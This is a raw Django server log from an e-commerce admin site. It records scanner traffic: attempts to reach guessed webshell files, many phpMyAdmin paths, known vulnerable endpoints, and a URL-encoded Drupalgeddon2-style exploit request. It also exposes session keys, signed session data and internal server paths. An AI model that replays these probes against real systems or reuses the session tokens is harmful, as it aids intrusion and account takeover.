/yyy.php HTTP/1.0" 404 6397 Not Found: /ack.php [29/Nov/2019 10:22:57] "POST /ack.php HTTP/1.0" 404 6397 Not Found: /shh.php [29/Nov/2019 10:22:58] "POST /shh.php HTTP/1.0" 404 6397 Not Found: /ddd.php [29/Nov/2019 10:22:59] "POST /ddd.php HTTP/1.0" 404 6397 Not Found: /nnn.php [29/Nov/2019 10:22:59] "POST /nnn.php HTTP/1.0" 404 6397 Not Found: /rrr.php [29/Nov/2019 10:23:00] "POST /rrr.php HTTP/1.0" 404 6397 Not Found: /ttt.php [29/Nov/2019 10:23:00] "POST /ttt.php HTTP/1.0" 404 6397 Not Found: /bbqq.php [29/Nov/2019 10:23:01] "POST /bbqq.php HTTP/1.0" 404 6400 Not Found: /tyrant.php [29/Nov/2019 10:23:01] "POST /tyrant.php HTTP/1.0" 404 6406 Not Found: /qiqi.php [29/Nov/2019 10:23:02] "POST /qiqi.php HTTP/1.0" 404 6400 Not Found: /qiqi1.php [29/Nov/2019 10:23:06] "POST /qiqi1.php HTTP/1.0" 404 6403 Not Found: /zhk.php [29/Nov/2019 10:23:07] "POST /zhk.php HTTP/1.0" 404 6397 Not Found: /605.php [29/Nov/2019 10:23:10] "POST /605.php HTTP/1.0" 404 6397 Not Found: /admin1.php [29/Nov/2019 10:23:10] "POST /admin1.php HTTP/1.0" 404 6406 Not Found: /999.php [29/Nov/2019 10:23:14] "POST /999.php HTTP/1.0" 404 6397 Not Found: /jsc.php [29/Nov/2019 10:23:15] "POST /jsc.php HTTP/1.0" 404 6397 Not Found: /jsc.php.php [29/Nov/2019 10:23:15] "POST /jsc.php.php HTTP/1.0" 404 6409 Not Found: /jsc.php [29/Nov/2019 10:23:16] "POST /jsc.php HTTP/1.0" 404 6397 Not Found: /seeyon/htmlofficeservlet [29/Nov/2019 10:23:18] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6447 Not Found: /secure/ContactAdministrators!default.jspa [29/Nov/2019 10:23:19] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6498 Not Found: /weaver/bsh.servlet.BshServlet [29/Nov/2019 10:23:19] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6462 [29/Nov/2019 10:23:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 10:23:20,064 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'solr'; args=('solr',) DEBUG 2019-11-29 10:23:20,104 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 10:23:20,106 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:23:20,108 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:23:20,109 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'solr' LIMIT 21; args=('solr',) DEBUG 2019-11-29 10:23:20,111 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:23:20,112 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'solr' LIMIT 21; args=('solr',) DEBUG 2019-11-29 10:23:20,113 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'solr' LIMIT 21; args=('solr',) DEBUG 2019-11-29 10:23:20,115 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'solr' LIMIT 21; args=('solr',) Internal Server Error: /solr/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 10:23:20] "GET /solr/ HTTP/1.0" 500 131336 Not Found: /index.php [29/Nov/2019 10:23:22] "POST /index.php HTTP/1.0" 404 6403 Not Found: /user/register [29/Nov/2019 10:23:22] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6652 [29/Nov/2019 10:23:23] "GET / HTTP/1.0" 302 0 Not Found: /user.php [29/Nov/2019 10:23:23] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6400 Not Found: /index.php [29/Nov/2019 10:23:24] "GET /index.php HTTP/1.0" 404 6402 Not Found: /phpMyAdmin/index.php [29/Nov/2019 10:23:26] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6435 Not Found: /pmd/index.php [29/Nov/2019 10:23:27] "GET /pmd/index.php HTTP/1.0" 404 6414 Not Found: /pma/index.php [29/Nov/2019 10:23:27] "GET /pma/index.php HTTP/1.0" 404 6414 Not Found: /PMA/index.php [29/Nov/2019 10:23:28] "GET /PMA/index.php HTTP/1.0" 404 6414 Not Found: /PMA2/index.php [29/Nov/2019 10:23:28] "GET /PMA2/index.php HTTP/1.0" 404 6417 Not Found: /pmamy/index.php [29/Nov/2019 10:23:29] "GET /pmamy/index.php HTTP/1.0" 404 6420 Not Found: /pmamy2/index.php [29/Nov/2019 10:23:30] "GET /pmamy2/index.php HTTP/1.0" 404 6423 Not Found: /mysql/index.php [29/Nov/2019 10:23:31] "GET /mysql/index.php HTTP/1.0" 404 6420 Not Found: /admin/index.php [29/Nov/2019 10:23:31] "GET /admin/index.php HTTP/1.0" 404 9027 Not Found: /db/index.php [29/Nov/2019 10:23:32] "GET /db/index.php HTTP/1.0" 404 6411 Not Found: /dbadmin/index.php [29/Nov/2019 10:23:32] "GET /dbadmin/index.php HTTP/1.0" 404 6426 Not Found: /web/phpMyAdmin/index.php [29/Nov/2019 10:23:33] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6447 Not Found: /admin/pma/index.php [29/Nov/2019 10:23:33] "GET /admin/pma/index.php HTTP/1.0" 404 9039 Not Found: /admin/PMA/index.php [29/Nov/2019 10:23:34] "GET /admin/PMA/index.php HTTP/1.0" 404 9039 Not Found: /admin/mysql2/index.php [29/Nov/2019 10:23:42] "GET /admin/mysql2/index.php HTTP/1.0" 404 9048 Not Found: /admin/phpmyadmin/index.php [29/Nov/2019 10:23:42] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 9060 Not Found: /admin/phpmyadmin2/index.php [29/Nov/2019 10:23:46] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 9063 Not Found: /mysqladmin/index.php [29/Nov/2019 10:23:47] "GET /mysqladmin/index.php HTTP/1.0" 404 6435 Not Found: /mysql_admin/index.php [29/Nov/2019 10:23:50] "GET /mysql_admin/index.php HTTP/1.0" 404 6438 Not Found: /phpadmin/index.php [29/Nov/2019 10:23:50] "GET /phpadmin/index.php HTTP/1.0" 404 6429 Not Found: /phpAdmin/index.php [29/Nov/2019 10:23:51] "GET /phpAdmin/index.php HTTP/1.0" 404 6429 Not Found: /phpmyadmin0/index.php [29/Nov/2019 10:23:52] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6438 Not Found: /phpmyadmin2/index.php [29/Nov/2019 10:23:54] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6438 Not Found: /phpMyAdmin-4.4.0/index.php [29/Nov/2019 10:23:55] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6453 Not Found: /phpMyAdmin4.8.0/index.php [29/Nov/2019 10:23:55] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6450 Not Found: /phpMyAdmin4.8.1/index.php [29/Nov/2019 10:23:56] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6450 Not Found: /phpMyAdmin4.8.2/index.php [29/Nov/2019 10:23:56] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6450 Not Found: /phpMyAdmin4.8.3/index.php [29/Nov/2019 10:23:57] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6450 Not Found: /phpMyAdmin4.8.5/index.php [29/Nov/2019 10:23:58] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6450 Not Found: /myadmin/index.php [29/Nov/2019 10:23:59] "GET /myadmin/index.php HTTP/1.0" 404 6426 Not Found: /myadmin2/index.php [29/Nov/2019 10:23:59] "GET /myadmin2/index.php HTTP/1.0" 404 6429 Not Found: /xampp/phpmyadmin/index.php [29/Nov/2019 10:24:00] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6453 Not Found: /phpMyadmin_bak/index.php [29/Nov/2019 10:24:00] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6447 Not Found: /www/phpMyAdmin/index.php [29/Nov/2019 10:24:01] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6447 Not Found: /tools/phpMyAdmin/index.php [29/Nov/2019 10:24:01] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6453 Not Found: /phpmyadmin-old/index.php [29/Nov/2019 10:24:02] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6447 Not Found: /phpMyAdminold/index.php [29/Nov/2019 10:24:06] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6444 Not Found: /phpMyAdmin.old/index.php [29/Nov/2019 10:24:07] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6447 Not Found: /claroline/phpMyAdmin/index.php [29/Nov/2019 10:24:10] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6465 Not Found: /typo3/phpmyadmin/index.php [29/Nov/2019 10:24:11] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6453 Not Found: /phpmyadmin/phpmyadmin/index.php [29/Nov/2019 10:24:14] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6468 Not Found: /phpMyAdmin/phpMyAdmin/index.php [29/Nov/2019 10:24:15] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6468 Not Found: /phpMyAbmin/index.php [29/Nov/2019 10:24:15] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6435 Not Found: /phpMyAdmin__/index.php [29/Nov/2019 10:24:16] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6441 Not Found: /v/index.php [29/Nov/2019 10:24:18] "GET /v/index.php HTTP/1.0" 404 6408 Not Found: /phpmyadm1n/index.php [29/Nov/2019 10:24:18] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6435 Not Found: /phpMyAdm1n/index.php [29/Nov/2019 10:24:19] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6435 Not Found: /shaAdmin/index.php [29/Nov/2019 10:24:20] "GET /shaAdmin/index.php HTTP/1.0" 404 6429 Not Found: /phpMyAdmion/index.php [29/Nov/2019 10:24:22] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6438 Not Found: /s/index.php [29/Nov/2019 10:24:22] "GET /s/index.php HTTP/1.0" 404 6408 Not Found: /MyAdmin/index.php [29/Nov/2019 10:24:23] "GET /MyAdmin/index.php HTTP/1.0" 404 6426 Not Found: /phpMyAdmin1/index.php [29/Nov/2019 10:24:24] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6438 Not Found: /phpMyAdmin123/index.php [29/Nov/2019 10:24:24] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6444 Not Found: /pwd/index.php [29/Nov/2019 10:24:25] "GET /pwd/index.php HTTP/1.0" 404 6414 Not Found: /phpMydmin/index.php [29/Nov/2019 10:24:26] "GET /phpMydmin/index.php HTTP/1.0" 404 6432 Not Found: /phpMyAdmins/index.php [29/Nov/2019 10:24:27] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6438 Not Found: /phpMyAdmin._/index.php [29/Nov/2019 10:24:27] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6441 Not Found: /phpMyAdmin._2/index.php [29/Nov/2019 10:24:28] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6444 Not Found: /phpmyadmin2222/index.php [29/Nov/2019 10:24:28] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6447 Not Found: /phpMyAdmin333/index.php [29/Nov/2019 10:24:29] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6444 Not Found: /phpmyadmin3333/index.php [29/Nov/2019 10:24:29] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6447 Not Found: /php2MyAdmin/index.php [29/Nov/2019 10:24:30] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6438 Not Found: /phpNyAdmin/index.php [29/Nov/2019 10:24:38] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6435 Not Found: /1/index.php [29/Nov/2019 10:24:39] "GET /1/index.php HTTP/1.0" 404 6408 Not Found: /phpMyAdmin_111/index.php [29/Nov/2019 10:24:42] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6447 Not Found: /phpmadmin/index.php [29/Nov/2019 10:24:42] "GET /phpmadmin/index.php HTTP/1.0" 404 6432 Not Found: /123131/index.php [29/Nov/2019 10:24:46] "GET /123131/index.php HTTP/1.0" 404 6423 Not Found: /phpMyAdminn/index.php [29/Nov/2019 10:24:46] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6438 Not Found: /phpMyAdminhf/index.php [29/Nov/2019 10:24:47] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6441 Not Found: /sbb/index.php [29/Nov/2019 10:24:48] "GET /sbb/index.php HTTP/1.0" 404 6414 Not Found: /phpMyAdmln/index.php [29/Nov/2019 10:24:50] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6435 Not Found: /phpMyAdmin_ai/index.php [29/Nov/2019 10:24:51] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6444 Not Found: /__phpMyAdmin/index.php [29/Nov/2019 10:24:51] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6441 Not Found: /program/index.php [29/Nov/2019 10:24:52] "GET /program/index.php HTTP/1.0" 404 6426 Not Found: /phppma/index.php [29/Nov/2019 10:24:54] "GET /phppma/index.php HTTP/1.0" 404 6423 Not Found: /phpmy/index.php [29/Nov/2019 10:24:55] "GET /phpmy/index.php HTTP/1.0" 404 6420 Not Found: /mysql/admin/index.php [29/Nov/2019 10:24:55] "GET /mysql/admin/index.php HTTP/1.0" 404 6438 Not Found: /mysql/dbadmin/index.php [29/Nov/2019 10:24:56] "GET /mysql/dbadmin/index.php HTTP/1.0" 404 6444 Not Found: /mysql/sqlmanager/index.php [29/Nov/2019 10:24:56] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6453 Not Found: /mysql/mysqlmanager/index.php [29/Nov/2019 10:24:57] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6459 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [29/Nov/2019 10:24:58] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6552 Not Found: /sqladmin/index.php [29/Nov/2019 10:24:59] "GET /sqladmin/index.php HTTP/1.0" 404 6429 Not Found: /sql/index.php [29/Nov/2019 10:24:59] "GET /sql/index.php HTTP/1.0" 404 6414 Not Found: /SQL/index.php [29/Nov/2019 10:25:00] "GET /SQL/index.php HTTP/1.0" 404 6414 Not Found: /websql/index.php [29/Nov/2019 10:25:00] "GET /websql/index.php HTTP/1.0" 404 6423 Not Found: /MySQLAdmin/index.php [29/Nov/2019 10:25:01] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6435 Not Found: /manager/html [29/Nov/2019 10:25:02] "GET /manager/html HTTP/1.0" 404 6411 [29/Nov/2019 10:27:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:28:22] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:28:48] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:33:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:38:38] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:43:40] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:48:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:53:55] "GET / HTTP/1.0" 302 0 [29/Nov/2019 10:59:03] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:04:07] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:09:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:12:12] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:14:19] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:19:26] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:24:32] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 11:27:19] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:29:38] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:34:41] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:39:49] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 11:44:53] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 11:46:29,157 utils 26999 140702522537728 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3151xs785j4tfjzph8iob25i759clxbs' LIMIT 1; args=('3151xs785j4tfjzph8iob25i759clxbs',) DEBUG 2019-11-29 11:46:29,160 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3151xs785j4tfjzph8iob25i759clxbs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T11:46:29.158303+00:00'::timestamptz); args=('3151xs785j4tfjzph8iob25i759clxbs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 11, 46, 29, 158303, tzinfo=)) [29/Nov/2019 11:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 11:49:57] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:55:08] "GET / HTTP/1.0" 302 0 [29/Nov/2019 11:59:47] "HEAD / HTTP/1.0" 302 0 [29/Nov/2019 12:00:12] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:05:19] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:10:26] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:15:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:20:41] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:25:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:30:54] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:32:02] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:36:02] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt DEBUG 2019-11-29 12:37:49,299 utils 26999 140702522537728 (0.010) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T12:37:49.279960+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 12, 37, 49, 279960, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 12:37:49] "GET /robots.txt HTTP/1.0" 404 6408 DEBUG 2019-11-29 12:37:49,303 utils 26999 140702522537728 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 12:37:49,340 utils 26999 140702522537728 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-11-29 12:37:49,343 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T12:37:49.341792+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 12, 37, 49, 341792, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 12:37:49] "GET / HTTP/1.0" 200 6019 Not Found: /favicon.ico [29/Nov/2019 12:37:52] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-11-29 12:37:57,541 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T12:37:57.531637+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 12, 37, 57, 531637, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 12:37:57,544 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 12:37:57,547 utils 26999 140702522537728 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-11-29 12:37:57,549 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 12:37:57,550 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 12:37:57,555 utils 26999 140702522537728 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-11-29 12:37:57,637 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T12:37:57.635623+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 12, 37, 57, 635623, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 12:37:57] "GET /auth/user/ HTTP/1.0" 200 8687 DEBUG 2019-11-29 12:37:58,588 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", 